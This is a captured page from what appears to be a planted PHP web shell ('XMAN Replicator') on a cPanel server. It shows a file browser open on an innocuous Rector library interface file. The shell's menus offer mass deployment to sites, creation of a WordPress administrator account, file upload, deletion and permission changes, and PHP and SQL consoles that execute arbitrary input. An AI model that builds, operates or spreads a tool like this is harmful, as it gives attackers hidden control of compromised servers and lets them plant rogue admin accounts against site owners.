🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
cpanel
/
ea-wappspector
/
vendor
/
rector
/
rector
/
src
/
NodeNameResolver
/
Contract
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-11-08 13:59
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-11-08 13:59
🔄
🗑️
🗑️📁
⬇️
🔒
NodeNameResolverInterface.php
400 B
-rw-r--r--
2024-11-08 13:59
✏️
🔄
🗑️
⬇️
🔒
Edit: NodeNameResolverInterface.php
<?php declare (strict_types=1); namespace Rector\NodeNameResolver\Contract; use PhpParser\Node; use PHPStan\Analyser\Scope; /** * @template TNode as Node */ interface NodeNameResolverInterface { /** * @return class-string<TNode> */ public function getNode() : string; /** * @param TNode $node */ public function resolve(Node $node, ?Scope $scope) : ?string; }
Save
PHP Console
Execute
SQL Console
Execute